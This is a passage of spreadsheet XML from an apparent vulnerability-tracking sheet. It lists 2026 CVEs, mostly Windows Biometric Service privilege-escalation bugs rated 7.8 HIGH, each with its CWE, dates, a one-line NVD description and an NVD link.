      <c r="K17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79" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73000</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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0" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73001</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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1" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73002</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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2" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73007</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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3" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73011</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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4" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73015</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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5" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73020</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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6" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73021</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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7" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73024</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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88" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73024</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73026</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K18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89" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76967</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>SAP NetWeaver Business Client does not perform sufficient validation when processing certain locally stored data during application startup. An attacker with low privileges on the local system could replace this data with specially crafted content. When the application is next launched, the crafted content is processed and could lead to arbitrary code execution in the context of the user. This results in a high impact on confidentiality, integrity and availability of the application.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77489</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K19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1" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77500</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K19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2" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77503</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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3" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77904</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K19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194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78447</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K19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5" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78448</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
